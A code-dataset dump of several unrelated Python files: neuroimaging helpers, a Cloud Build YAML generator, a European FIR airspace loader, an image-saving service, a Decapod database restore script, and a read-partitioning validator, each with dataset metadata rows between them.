    """Calculate the effect size using the Cliff's delta.

    Returns (#{X[i] > Y[j]} - #{X[i] < Y[j]}) / (len(X) * len(Y)),
    a value in [-1, 1].
    """
    lx = len(X)
    ly = len(Y)
    # Vectorised replacement for the original O(lx*ly) Python double loop:
    # sign(X[i] - Y[j]) is +1 / -1 / 0, exactly the old comparison matrix.
    mat = np.sign(np.asarray(X, dtype=float)[:, None] - np.asarray(Y, dtype=float))
    return (np.sum(mat)) / (lx * ly)
def load_dataset(demographic_path, ids_path, freesurfer_path):
    """Load dataset."""
    # Demographics restricted to the selected ids, then inner-joined with
    # the FreeSurfer volume table on the shared 'Image_ID' column.
    demographic_data = load_demographic_data(demographic_path, ids_path)
    freesurfer_df = pd.read_csv(freesurfer_path)
    dataset_df = pd.merge(freesurfer_df, demographic_data, on='Image_ID')
    return dataset_df
def load_demographic_data(demographic_path, ids_path):
    """Load dataset using selected ids."""
    demographic_df = pd.read_csv(demographic_path, sep='\t')
    demographic_df = demographic_df.dropna()
    ids_df = pd.read_csv(ids_path, usecols=['Image_ID'])
    # Build a merge key ('uid') at whatever granularity the demographic
    # file provides: participant+session+run, participant+session, or
    # participant only.
    if 'Run_ID' in demographic_df.columns:
        demographic_df['uid'] = demographic_df['participant_id'] + '_' + demographic_df['Session_ID'] + '_run-' + \
                                demographic_df['Run_ID'].apply(str)
        # Assumes Image_ID looks like "<participant>_<session>_<run>..." —
        # TODO confirm against the ids file format.
        ids_df['uid'] = ids_df['Image_ID'].str.split('_').str[0] + '_' + ids_df['Image_ID'].str.split('_').str[1]+ '_' + ids_df['Image_ID'].str.split('_').str[2]
        dataset_df = pd.merge(ids_df, demographic_df, on='uid')
        dataset_df = dataset_df.drop(columns=['uid'])
    elif 'Session_ID' in demographic_df.columns:
        demographic_df['uid'] = demographic_df['participant_id'] + '_' + demographic_df['Session_ID']
        ids_df['uid'] = ids_df['Image_ID'].str.split('_').str[0] + '_' + ids_df['Image_ID'].str.split('_').str[1]
        dataset_df = pd.merge(ids_df, demographic_df, on='uid')
        dataset_df = dataset_df.drop(columns=['uid'])
    else:
        ids_df['participant_id'] = ids_df['Image_ID'].str.split('_').str[0]
        dataset_df = pd.merge(ids_df, demographic_df, on='participant_id')
    return dataset_df
# FreeSurfer region names used as feature columns: subcortical volumes,
# corpus-callosum (CC_*) segments, and per-hemisphere (lh_/rh_) cortical
# parcellation volumes.
COLUMNS_NAME = ['Left-Lateral-Ventricle',
                'Left-Inf-Lat-Vent',
                'Left-Cerebellum-White-Matter',
                'Left-Cerebellum-Cortex',
                'Left-Thalamus-Proper',
                'Left-Caudate',
                'Left-Putamen',
                'Left-Pallidum',
                '3rd-Ventricle',
                '4th-Ventricle',
                'Brain-Stem',
                'Left-Hippocampus',
                'Left-Amygdala',
                'CSF',
                'Left-Accumbens-area',
                'Left-VentralDC',
                'Right-Lateral-Ventricle',
                'Right-Inf-Lat-Vent',
                'Right-Cerebellum-White-Matter',
                'Right-Cerebellum-Cortex',
                'Right-Thalamus-Proper',
                'Right-Caudate',
                'Right-Putamen',
                'Right-Pallidum',
                'Right-Hippocampus',
                'Right-Amygdala',
                'Right-Accumbens-area',
                'Right-VentralDC',
                'CC_Posterior',
                'CC_Mid_Posterior',
                'CC_Central',
                'CC_Mid_Anterior',
                'CC_Anterior',
                'lh_bankssts_volume',
                'lh_caudalanteriorcingulate_volume',
                'lh_caudalmiddlefrontal_volume',
                'lh_cuneus_volume',
                'lh_entorhinal_volume',
                'lh_fusiform_volume',
                'lh_inferiorparietal_volume',
                'lh_inferiortemporal_volume',
                'lh_isthmuscingulate_volume',
                'lh_lateraloccipital_volume',
                'lh_lateralorbitofrontal_volume',
                'lh_lingual_volume',
                'lh_medialorbitofrontal_volume',
                'lh_middletemporal_volume',
                'lh_parahippocampal_volume',
                'lh_paracentral_volume',
                'lh_parsopercularis_volume',
                'lh_parsorbitalis_volume',
                'lh_parstriangularis_volume',
                'lh_pericalcarine_volume',
                'lh_postcentral_volume',
                'lh_posteriorcingulate_volume',
                'lh_precentral_volume',
                'lh_precuneus_volume',
                'lh_rostralanteriorcingulate_volume',
                'lh_rostralmiddlefrontal_volume',
                'lh_superiorfrontal_volume',
                'lh_superiorparietal_volume',
                'lh_superiortemporal_volume',
                'lh_supramarginal_volume',
                'lh_frontalpole_volume',
                'lh_temporalpole_volume',
                'lh_transversetemporal_volume',
                'lh_insula_volume',
                'rh_bankssts_volume',
                'rh_caudalanteriorcingulate_volume',
                'rh_caudalmiddlefrontal_volume',
                'rh_cuneus_volume',
                'rh_entorhinal_volume',
                'rh_fusiform_volume',
                'rh_inferiorparietal_volume',
                'rh_inferiortemporal_volume',
                'rh_isthmuscingulate_volume',
                'rh_lateraloccipital_volume',
                'rh_lateralorbitofrontal_volume',
                'rh_lingual_volume',
                'rh_medialorbitofrontal_volume',
                'rh_middletemporal_volume',
                'rh_parahippocampal_volume',
                'rh_paracentral_volume',
                'rh_parsopercularis_volume',
                'rh_parsorbitalis_volume',
                'rh_parstriangularis_volume',
                'rh_pericalcarine_volume',
                'rh_postcentral_volume',
                'rh_posteriorcingulate_volume',
                'rh_precentral_volume',
                'rh_precuneus_volume',
                'rh_rostralanteriorcingulate_volume',
                'rh_rostralmiddlefrontal_volume',
                'rh_superiorfrontal_volume',
                'rh_superiorparietal_volume',
                'rh_superiortemporal_volume',
                'rh_supramarginal_volume',
                'rh_frontalpole_volume',
                'rh_temporalpole_volume',
                'rh_transversetemporal_volume',
                'rh_insula_volume']
|
"""Helper functions and constants."""
from pathlib import Path
import warnings
import pandas as pd
import numpy as np
PROJECT_ROOT = Path.cwd()
def cliff_delta(X, Y):
"""Calculate the effect size using the Cliff's delta."""
lx = len(X)
ly = len(Y)
mat = np.zeros((lx, ly))
for i in range(0, lx):
for j in range(0, ly):
if X[i] > Y[j]:
mat[i, j] = 1
elif Y[j] > X[i]:
mat[i, j] = -1
return (np.sum(mat)) / (lx * ly)
def load_dataset(demographic_path, ids_path, freesurfer_path):
"""Load dataset."""
demographic_data = load_demographic_data(demographic_path, ids_path)
freesurfer_df = pd.read_csv(freesurfer_path)
dataset_df = pd.merge(freesurfer_df, demographic_data, on='Image_ID')
return dataset_df
def load_demographic_data(demographic_path, ids_path):
"""Load dataset using selected ids."""
demographic_df = pd.read_csv(demographic_path, sep='\t')
demographic_df = demographic_df.dropna()
ids_df = pd.read_csv(ids_path, usecols=['Image_ID'])
if 'Run_ID' in demographic_df.columns:
demographic_df['uid'] = demographic_df['participant_id'] + '_' + demographic_df['Session_ID'] + '_run-' + \
demographic_df['Run_ID'].apply(str)
ids_df['uid'] = ids_df['Image_ID'].str.split('_').str[0] + '_' + ids_df['Image_ID'].str.split('_').str[1]+ '_' + ids_df['Image_ID'].str.split('_').str[2]
dataset_df = pd.merge(ids_df, demographic_df, on='uid')
dataset_df = dataset_df.drop(columns=['uid'])
elif 'Session_ID' in demographic_df.columns:
demographic_df['uid'] = demographic_df['participant_id'] + '_' + demographic_df['Session_ID']
ids_df['uid'] = ids_df['Image_ID'].str.split('_').str[0] + '_' + ids_df['Image_ID'].str.split('_').str[1]
dataset_df = pd.merge(ids_df, demographic_df, on='uid')
dataset_df = dataset_df.drop(columns=['uid'])
else:
ids_df['participant_id'] = ids_df['Image_ID'].str.split('_').str[0]
dataset_df = pd.merge(ids_df, demographic_df, on='participant_id')
return dataset_df
COLUMNS_NAME = ['Left-Lateral-Ventricle',
'Left-Inf-Lat-Vent',
'Left-Cerebellum-White-Matter',
'Left-Cerebellum-Cortex',
'Left-Thalamus-Proper',
'Left-Caudate',
'Left-Putamen',
'Left-Pallidum',
'3rd-Ventricle',
'4th-Ventricle',
'Brain-Stem',
'Left-Hippocampus',
'Left-Amygdala',
'CSF',
'Left-Accumbens-area',
'Left-VentralDC',
'Right-Lateral-Ventricle',
'Right-Inf-Lat-Vent',
'Right-Cerebellum-White-Matter',
'Right-Cerebellum-Cortex',
'Right-Thalamus-Proper',
'Right-Caudate',
'Right-Putamen',
'Right-Pallidum',
'Right-Hippocampus',
'Right-Amygdala',
'Right-Accumbens-area',
'Right-VentralDC',
'CC_Posterior',
'CC_Mid_Posterior',
'CC_Central',
'CC_Mid_Anterior',
'CC_Anterior',
'lh_bankssts_volume',
'lh_caudalanteriorcingulate_volume',
'lh_caudalmiddlefrontal_volume',
'lh_cuneus_volume',
'lh_entorhinal_volume',
'lh_fusiform_volume',
'lh_inferiorparietal_volume',
'lh_inferiortemporal_volume',
'lh_isthmuscingulate_volume',
'lh_lateraloccipital_volume',
'lh_lateralorbitofrontal_volume',
'lh_lingual_volume',
'lh_medialorbitofrontal_volume',
'lh_middletemporal_volume',
'lh_parahippocampal_volume',
'lh_paracentral_volume',
'lh_parsopercularis_volume',
'lh_parsorbitalis_volume',
'lh_parstriangularis_volume',
'lh_pericalcarine_volume',
'lh_postcentral_volume',
'lh_posteriorcingulate_volume',
'lh_precentral_volume',
'lh_precuneus_volume',
'lh_rostralanteriorcingulate_volume',
'lh_rostralmiddlefrontal_volume',
'lh_superiorfrontal_volume',
'lh_superiorparietal_volume',
'lh_superiortemporal_volume',
'lh_supramarginal_volume',
'lh_frontalpole_volume',
'lh_temporalpole_volume',
'lh_transversetemporal_volume',
'lh_insula_volume',
'rh_bankssts_volume',
'rh_caudalanteriorcingulate_volume',
'rh_caudalmiddlefrontal_volume',
'rh_cuneus_volume',
'rh_entorhinal_volume',
'rh_fusiform_volume',
'rh_inferiorparietal_volume',
'rh_inferiortemporal_volume',
'rh_isthmuscingulate_volume',
'rh_lateraloccipital_volume',
'rh_lateralorbitofrontal_volume',
'rh_lingual_volume',
'rh_medialorbitofrontal_volume',
'rh_middletemporal_volume',
'rh_parahippocampal_volume',
'rh_paracentral_volume',
'rh_parsopercularis_volume',
'rh_parsorbitalis_volume',
'rh_parstriangularis_volume',
'rh_pericalcarine_volume',
'rh_postcentral_volume',
'rh_posteriorcingulate_volume',
'rh_precentral_volume',
'rh_precuneus_volume',
'rh_rostralanteriorcingulate_volume',
'rh_rostralmiddlefrontal_volume',
'rh_superiorfrontal_volume',
'rh_superiorparietal_volume',
'rh_superiortemporal_volume',
'rh_supramarginal_volume',
'rh_frontalpole_volume',
'rh_temporalpole_volume',
'rh_transversetemporal_volume',
'rh_insula_volume']
|
en
| 0.608765
|
Helper functions and constants. Calculate the effect size using the Cliff's delta. Load dataset. Load dataset using selected ids.
| 2.835362
| 3
|
ftl/ftl_node_benchmark_yaml.py
|
myelin/GoogleCloudPlatform-runtimes-common
| 0
|
6628114
|
"""A script to generate a cloudbuild yaml."""
import os
import yaml
import argparse
# Add directories for new tests here.
DEP_TESTS = ['small_app', 'medium_app', 'large_app']
APP_SIZE_TESTS = {
'scratch_small': '5',
'scratch_medium': '500',
'scratch_large': '50000'
}
_DATA_DIR = '/workspace/ftl/node/benchmark/data/'
_NODE_BASE = 'gcr.io/google-appengine/nodejs:latest'
parser = argparse.ArgumentParser(
description='Generate cloudbuild yaml for FTL benchmarking.')
parser.add_argument(
'--iterations',
action='store',
type=int,
default=5,
help='Number of times to build the image.')
parser.add_argument(
'--dep-test',
dest='dep_test',
action='store_true',
default=False,
help='Flag to enable to dependency test for the benchmark.')
parser.add_argument(
'--app-size-test',
dest='app_size_test',
action='store_true',
default=False,
help='Flag to enable the app size test for the benchmark.')
def main():
    """Assemble and print the cloudbuild yaml for the requested benchmarks."""
    args = parser.parse_args()
    # Run both suites unless both were explicitly requested.  Bug fix: the
    # original referenced the non-existent ``args.app_size`` (the argparse
    # dest is ``app_size_test``), which raised AttributeError when
    # --dep-test was given and never enabled the app-size suite by default.
    if not (args.dep_test and args.app_size_test):
        args.dep_test = True
        args.app_size_test = True
    cloudbuild_yaml = {
        'steps': [
            # We need to chmod in some cases for permissions.
            {
                'name': 'ubuntu',
                'args': ['chmod', 'a+rx', '-R', '/workspace']
            },
            # Build the FTL image from source and load it into the daemon.
            {
                'name':
                'gcr.io/cloud-builders/bazel',
                'args': [
                    'run', '//ftl/node/benchmark:node_benchmark_image', '--',
                    '--norun'
                ],
            },
            # Build the node builder par file
            {
                'name': 'gcr.io/cloud-builders/bazel',
                'args': ['build', 'ftl:node_builder.par']
            },
        ]
    }
    # Generate a set of steps for each test and add them.
    if args.dep_test:
        for app_dir in DEP_TESTS:
            cloudbuild_yaml['steps'] += dependency_test_step(
                app_dir, args.iterations)
    if args.app_size_test:
        for app_dir in APP_SIZE_TESTS:
            cloudbuild_yaml['steps'] += app_size_test_step(
                app_dir, args.iterations, APP_SIZE_TESTS[app_dir])
    # print(...) works under both Python 2 and 3; the original used a
    # Python-2-only print statement.
    print(yaml.dump(cloudbuild_yaml))
def dependency_test_step(app_dir, iterations):
    """Return the cloudbuild step list benchmarking the app in ``app_dir``."""
    name = 'gcr.io/ftl-node-test/benchmark_%s:latest' % app_dir
    return [
        # First build the image
        {
            'name':
            'bazel/ftl/node/benchmark:node_benchmark_image',
            'args': [
                '--base', _NODE_BASE, '--name', name, '--directory',
                # Idiom fix: join(dir, name) instead of join(dir + name);
                # same result here since _DATA_DIR ends with '/'.
                os.path.join(_DATA_DIR, app_dir), '--description', app_dir,
                '--iterations',
                str(iterations)
            ]
        }
    ]
def app_size_test_step(app_dir, iterations, gen_files):
    """Return the cloudbuild step list for the app-size benchmark in ``app_dir``."""
    name = 'gcr.io/ftl-node-test/benchmark_%s:latest' % app_dir
    return [
        # First build the image
        {
            'name':
            'bazel/ftl/node/benchmark:node_benchmark_image',
            'args': [
                '--base', _NODE_BASE, '--name', name, '--directory',
                # Idiom fix: join(dir, name) instead of join(dir + name);
                # same result here since _DATA_DIR ends with '/'.
                os.path.join(_DATA_DIR, app_dir), '--description', app_dir,
                '--iterations',
                str(iterations), '--gen_files', gen_files
            ]
        }
    ]
if __name__ == "__main__":
main()
|
"""A script to generate a cloudbuild yaml."""
import os
import yaml
import argparse
# Add directories for new tests here.
DEP_TESTS = ['small_app', 'medium_app', 'large_app']
APP_SIZE_TESTS = {
'scratch_small': '5',
'scratch_medium': '500',
'scratch_large': '50000'
}
_DATA_DIR = '/workspace/ftl/node/benchmark/data/'
_NODE_BASE = 'gcr.io/google-appengine/nodejs:latest'
parser = argparse.ArgumentParser(
description='Generate cloudbuild yaml for FTL benchmarking.')
parser.add_argument(
'--iterations',
action='store',
type=int,
default=5,
help='Number of times to build the image.')
parser.add_argument(
'--dep-test',
dest='dep_test',
action='store_true',
default=False,
help='Flag to enable to dependency test for the benchmark.')
parser.add_argument(
'--app-size-test',
dest='app_size_test',
action='store_true',
default=False,
help='Flag to enable the app size test for the benchmark.')
def main():
    """Assemble and print the cloudbuild yaml for the requested benchmarks."""
    args = parser.parse_args()
    # Run both suites unless both were explicitly requested.  Bug fix: the
    # original referenced the non-existent ``args.app_size`` (the argparse
    # dest is ``app_size_test``), which raised AttributeError when
    # --dep-test was given and never enabled the app-size suite by default.
    if not (args.dep_test and args.app_size_test):
        args.dep_test = True
        args.app_size_test = True
    cloudbuild_yaml = {
        'steps': [
            # We need to chmod in some cases for permissions.
            {
                'name': 'ubuntu',
                'args': ['chmod', 'a+rx', '-R', '/workspace']
            },
            # Build the FTL image from source and load it into the daemon.
            {
                'name':
                'gcr.io/cloud-builders/bazel',
                'args': [
                    'run', '//ftl/node/benchmark:node_benchmark_image', '--',
                    '--norun'
                ],
            },
            # Build the node builder par file
            {
                'name': 'gcr.io/cloud-builders/bazel',
                'args': ['build', 'ftl:node_builder.par']
            },
        ]
    }
    # Generate a set of steps for each test and add them.
    if args.dep_test:
        for app_dir in DEP_TESTS:
            cloudbuild_yaml['steps'] += dependency_test_step(
                app_dir, args.iterations)
    if args.app_size_test:
        for app_dir in APP_SIZE_TESTS:
            cloudbuild_yaml['steps'] += app_size_test_step(
                app_dir, args.iterations, APP_SIZE_TESTS[app_dir])
    # print(...) works under both Python 2 and 3; the original used a
    # Python-2-only print statement.
    print(yaml.dump(cloudbuild_yaml))
def dependency_test_step(app_dir, iterations):
name = 'gcr.io/ftl-node-test/benchmark_%s:latest' % app_dir
return [
# First build the image
{
'name':
'bazel/ftl/node/benchmark:node_benchmark_image',
'args': [
'--base', _NODE_BASE, '--name', name, '--directory',
os.path.join(_DATA_DIR + app_dir), '--description', app_dir,
'--iterations',
str(iterations)
]
}
]
def app_size_test_step(app_dir, iterations, gen_files):
name = 'gcr.io/ftl-node-test/benchmark_%s:latest' % app_dir
return [
# First build the image
{
'name':
'bazel/ftl/node/benchmark:node_benchmark_image',
'args': [
'--base', _NODE_BASE, '--name', name, '--directory',
os.path.join(_DATA_DIR + app_dir), '--description', app_dir,
'--iterations',
str(iterations), '--gen_files', gen_files
]
}
]
if __name__ == "__main__":
main()
|
en
| 0.858464
|
A script to generate a cloudbuild yaml. # Add directories for new tests here. # We need to chmod in some cases for permissions. # Build the FTL image from source and load it into the daemon. # Build the node builder par file # Generate a set of steps for each test and add them. # Generate a set of steps for each test and add them. # First build the image # First build the image
| 3.007129
| 3
|
traffic/data/airspaces/eurofirs.py
|
RaphaelDELAIR/traffic
| 209
|
6628115
|
<gh_stars>100-1000
import json
from pathlib import Path
from shapely.geometry import polygon, shape
from ...core.airspace import Airspace, ExtrudedPolygon
# Load the bundled GeoJSON of European FIRs and build one Airspace per
# feature, keyed by its identifier.
with Path(__file__).absolute().with_name("eurofirs.json").open("r") as fh:
    fir = json.load(fh)
eurofirs = {
    elt["properties"]["IDENT"]: Airspace(
        name=elt["properties"]["NAME"][:-4],  # Remove " FIR" at the end
        elements=[
            ExtrudedPolygon(
                # sign=-1 normalises the polygon orientation (clockwise
                # exterior ring per shapely's orient()).
                polygon.orient(shape(elt["geometry"]), -1),
                # Vertical extent in the units stored in the GeoJSON
                # properties -- presumably flight levels; verify upstream.
                int(elt["properties"]["LOWERLIMIT"]),
                int(elt["properties"]["UPPERLIMIT"]),
            )
        ],
        type_=elt["properties"]["TYPE"],
        designator=elt["properties"]["IDENT"],
        properties=elt["properties"],
    )
    for elt in fir["features"]
}
|
import json
from pathlib import Path
from shapely.geometry import polygon, shape
from ...core.airspace import Airspace, ExtrudedPolygon
with Path(__file__).absolute().with_name("eurofirs.json").open("r") as fh:
fir = json.load(fh)
eurofirs = {
elt["properties"]["IDENT"]: Airspace(
name=elt["properties"]["NAME"][:-4], # Remove " FIR" at the end
elements=[
ExtrudedPolygon(
polygon.orient(shape(elt["geometry"]), -1),
int(elt["properties"]["LOWERLIMIT"]),
int(elt["properties"]["UPPERLIMIT"]),
)
],
type_=elt["properties"]["TYPE"],
designator=elt["properties"]["IDENT"],
properties=elt["properties"],
)
for elt in fir["features"]
}
|
en
| 0.840733
|
# Remove " FIR" at the end
| 2.712085
| 3
|
api/src/service/util/ImageService.py
|
SamuelJansen/idealizar-whats-app-manager-api
| 0
|
6628116
|
from io import BytesIO
import base64
from PIL import Image
from python_helper import Constant as c
from python_framework import Service, ServiceMethod
from dto import QRCodeDto
@Service()
class ImageService :
    """Service that decodes base64-encoded images and persists them to disk."""

    @ServiceMethod(requestClass=[str, str])
    def save(self, imageAsBase64, pathWithNameAndExtension) :
        # Decode the base64 payload and parse it with PIL.
        # NOTE(review): ``self.helper`` is not defined in this file --
        # presumably injected by python_framework's @Service decorator;
        # verify before relying on it.
        image = Image.open(BytesIO(self.helper.base64.decode(imageAsBase64)))
        image.save(pathWithNameAndExtension)
        return image
|
from io import BytesIO
import base64
from PIL import Image
from python_helper import Constant as c
from python_framework import Service, ServiceMethod
from dto import QRCodeDto
@Service()
class ImageService :
@ServiceMethod(requestClass=[str, str])
def save(self, imageAsBase64, pathWithNameAndExtension) :
image = Image.open(BytesIO(self.helper.base64.decode(imageAsBase64)))
image.save(pathWithNameAndExtension)
return image
|
none
| 1
| 2.608981
| 3
|
|
scripts/restore_db.py
|
angry-tony/ceph-lcm-decapod
| 41
|
6628117
|
<reponame>angry-tony/ceph-lcm-decapod
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2016 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module containers script to perform restore of the Decapod."""
import argparse
import os
import os.path
import subprocess
import sys
DEFAULT_PROJECT_DIR = os.path.dirname(os.getcwd())
"""Name of the default project."""
def main():
    """Restore the Decapod database from a backup file via the admin container."""
    options = get_options()
    options.compose_file.close()
    container_name = get_container_name(options)
    command = [
        "docker", "exec", "-i", container_name,
        "decapod-admin", "db", "restore"
    ]
    with open(options.backup_path, "rb") as result_fp:
        # Discard the subprocess output.  Bug fix: the devnull handle must
        # be opened for *writing* -- the original opened it read-only, so
        # the child's writes to stdout would fail (EBADF).
        with open(os.devnull, "w") as dnull:
            subprocess.check_call(
                command,
                stdin=result_fp,
                stdout=dnull
            )
def get_options():
    """Build and parse the command-line options for this script."""
    parser = argparse.ArgumentParser(
        description="Restore Decapod database on _working_ containers.",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter
    )
    parser.add_argument(
        "-f", "--compose-file",
        type=argparse.FileType(),
        default=get_compose_file_path(),
        help="Path to docker-compose.yml file."
    )
    parser.add_argument(
        "-p", "--project-name",
        default=get_project_name(),
        help="The name of the project."
    )
    # NOTE(review): the help text says "store" but this path is *read* as
    # the backup to restore from.
    parser.add_argument(
        "backup_path",
        help="Path where to store backup."
    )
    return parser.parse_args()
def get_compose_file_path():
    """Resolve the compose file path: $COMPOSE_FILE or ./docker-compose.yml."""
    default = os.path.join(os.getcwd(), "docker-compose.yml")
    return os.path.abspath(os.getenv("COMPOSE_FILE", default))
def get_project_name():
    """Project name: $COMPOSE_PROJECT_NAME (basename) or the parent dir's name."""
    raw = os.getenv("COMPOSE_PROJECT_NAME", os.path.dirname(os.getcwd()))
    return os.path.basename(raw)
def get_container_name(options):
    """Return the container id of the 'admin' service via ``docker-compose ps -q``."""
    command = [
        "docker-compose",
        "--project-name", options.project_name,
        "--file", options.compose_file.name,
        "ps", "-q", "admin"
    ]
    # -q prints only the container id; strip the trailing newline.
    output = subprocess.check_output(command).strip().decode("utf-8")
    return output
if __name__ == "__main__":
sys.exit(main())
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2016 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module containers script to perform restore of the Decapod."""
import argparse
import os
import os.path
import subprocess
import sys
DEFAULT_PROJECT_DIR = os.path.dirname(os.getcwd())
"""Name of the default project."""
def main():
    """Restore the Decapod database from a backup file.

    Streams the file at ``options.backup_path`` into
    ``decapod-admin db restore`` running inside the admin container.
    Raises subprocess.CalledProcessError if the restore command fails.
    """
    options = get_options()
    # argparse.FileType already opened the compose file to validate it;
    # only its name is needed later, so release the handle right away.
    options.compose_file.close()
    container_name = get_container_name(options)
    command = [
        "docker", "exec", "-i", container_name,
        "decapod-admin", "db", "restore"
    ]
    with open(options.backup_path, "rb") as result_fp:
        # BUGFIX: os.devnull was opened in the default read mode but used as
        # the child's stdout; it must be opened for writing.
        with open(os.devnull, "w") as dnull:
            subprocess.check_call(
                command,
                stdin=result_fp,
                stdout=dnull
            )
def get_options():
parser = argparse.ArgumentParser(
description="Restore Decapod database on _working_ containers.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument(
"-f", "--compose-file",
type=argparse.FileType(),
default=get_compose_file_path(),
help="Path to docker-compose.yml file."
)
parser.add_argument(
"-p", "--project-name",
default=get_project_name(),
help="The name of the project."
)
parser.add_argument(
"backup_path",
help="Path where to store backup."
)
return parser.parse_args()
def get_compose_file_path():
path = os.getenv("COMPOSE_FILE", os.path.join(
os.getcwd(), "docker-compose.yml"))
path = os.path.abspath(path)
return path
def get_project_name():
name = os.getenv("COMPOSE_PROJECT_NAME", os.path.dirname(os.getcwd()))
name = os.path.basename(name)
return name
def get_container_name(options):
command = [
"docker-compose",
"--project-name", options.project_name,
"--file", options.compose_file.name,
"ps", "-q", "admin"
]
output = subprocess.check_output(command).strip().decode("utf-8")
return output
if __name__ == "__main__":
sys.exit(main())
|
en
| 0.81509
|
#!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright (c) 2016 Mirantis Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. This module containers script to perform restore of the Decapod. Name of the default project.
| 2.301531
| 2
|
whdenovo/validate.py
|
shilpagarg/WHdenovo
| 45
|
6628118
|
<reponame>shilpagarg/WHdenovo
'''
Validate partitioning result for either simulated data or real data
'''
import sys, os
import re
import subprocess
from subprocess import PIPE
from . import validate_simulate
from . import validate_real
def valSim(path, pacbioFA):
    """Validate partitioning accuracy for simulated data.

    Concatenates all per-block ``.allreads`` files under ``path``/bc1 into a
    single file and hands it to validate_simulate.

    path     -- output directory of the partitioning run.
    pacbioFA -- PacBio FASTA; currently only referenced by the commented-out
                unpartitioned-read check below.
    """
    whdenovoPath = '/'.join(sys.path[0].split('/')[:-1])  # repo root, kept for the commented calls below
    fileList = os.listdir(path)
    allreadslist = []
    for i in fileList:
        # BUGFIX: the old pattern r'.*_block_*.allreads' read '_*' as "zero or
        # more underscores" and '.' as "any character", so names such as
        # 'x_block_1.allreads' never matched. Use a real wildcard and escape
        # the literal dot.
        if re.match(r'.*_block_.*\.allreads', i):
            allreadslist.append(i)
    # NOTE(review): allreadslist is collected but unused — the shell glob
    # below performs the actual merge. Kept for parity with the original flow.
    subprocess.call('cat %s/bc1/*.allreads > %s/bc1/all.allreads'%(path, path), shell = True)
    validate_simulate.compute_read_partitioning_accuracy('%s/bc1/all.allreads'%path)
    #subprocess.call('python %s/src/validate_simulate.py %s/all.allreads'%(whdenovoPath, path), shell = True)
    #subprocess.call("cat %s/bc1/all.allreads | cut -d' ' -f1 | sort -u | uniq > %s/bc1/all.tmpreads"%(path, path), shell = True)
    #subprocess.call('python %s/src/get_unpartitioned.py %s/bc1/all.tmpreads %s'%(whdenovoPath, path, pacbioFA), shell = True)
def valReal(path, tag):
    """Validate partitioning accuracy for real data.

    Thin wrapper: delegates to validate_real with the partitioning output
    directory ``path`` and ``tag`` — presumably the --truth argument passed
    through from main(); TODO confirm against validate_real.
    """
    validate_real.compute_read_partitioning_accuracy(path, tag)
def add_arguments(parser):
    """Register the validation subcommand's options on *parser*."""
    parser.add_argument('-p', '--path', required=True,
                        help='The output path of partitioning results.')
    parser.add_argument('-f', '--fasta', required=False,
                        help='Required for simulated data validation.')
    parser.add_argument('-t', '--truth', required=False,
                        help='Required for real data validation.')
def main(args):
    """Dispatch validation based on which of --fasta/--truth was supplied.

    Supplying both is rejected; --fasta selects the simulated-data check,
    otherwise the real-data check runs with --truth.
    """
    have_fasta = args.fasta is not None
    have_truth = args.truth is not None
    if have_fasta and have_truth:
        print('choose only one!')
    elif have_fasta:
        valSim(args.path, args.fasta)
    else:
        valReal(args.path, args.truth)
|
'''
Validate partitioning result for either simulated data or real data
'''
import sys, os
import re
import subprocess
from subprocess import PIPE
from . import validate_simulate
from . import validate_real
def valSim(path, pacbioFA):
whdenovoPath = '/'.join(sys.path[0].split('/')[:-1])
fileList = os.listdir(path)
readslist = []
allreadslist = []
for i in fileList:
if re.match(r'.*_block_*.allreads', i):
allreadslist.append(i)
subprocess.call('cat %s/bc1/*.allreads > %s/bc1/all.allreads'%(path, path), shell = True)
validate_simulate.compute_read_partitioning_accuracy('%s/bc1/all.allreads'%path)
#subprocess.call('python %s/src/validate_simulate.py %s/all.allreads'%(whdenovoPath, path), shell = True)
#subprocess.call("cat %s/bc1/all.allreads | cut -d' ' -f1 | sort -u | uniq > %s/bc1/all.tmpreads"%(path, path), shell = True)
#subprocess.call('python %s/src/get_unpartitioned.py %s/bc1/all.tmpreads %s'%(whdenovoPath, path, pacbioFA), shell = True)
def valReal(path, tag):
validate_real.compute_read_partitioning_accuracy(path, tag)
def add_arguments(parser):
arg = parser.add_argument
arg('-p', '--path', required = True, help = 'The output path of partitioning results.')
arg('-f', '--fasta', required = False, help = 'Required for simulated data validation.')
arg('-t', '--truth', required = False, help = 'Required for real data validation.')
def main(args):
if args.fasta != None and args.truth != None:
print('choose only one!')
elif args.fasta != None:
valSim(args.path, args.fasta)
else:
valReal(args.path, args.truth)
|
en
| 0.354997
|
Validate partitioning result for either simulated data or real data #subprocess.call('python %s/src/validate_simulate.py %s/all.allreads'%(whdenovoPath, path), shell = True) #subprocess.call("cat %s/bc1/all.allreads | cut -d' ' -f1 | sort -u | uniq > %s/bc1/all.tmpreads"%(path, path), shell = True) #subprocess.call('python %s/src/get_unpartitioned.py %s/bc1/all.tmpreads %s'%(whdenovoPath, path, pacbioFA), shell = True)
| 2.464684
| 2
|
AMR-Policies-Other/train_Maze.py
|
irom-lab/AMR-Policies
| 2
|
6628119
|
# NOTE(review): flat training script — configures an AMR-policy training run
# in a maze environment and launches it under ray. All heavy lifting lives in
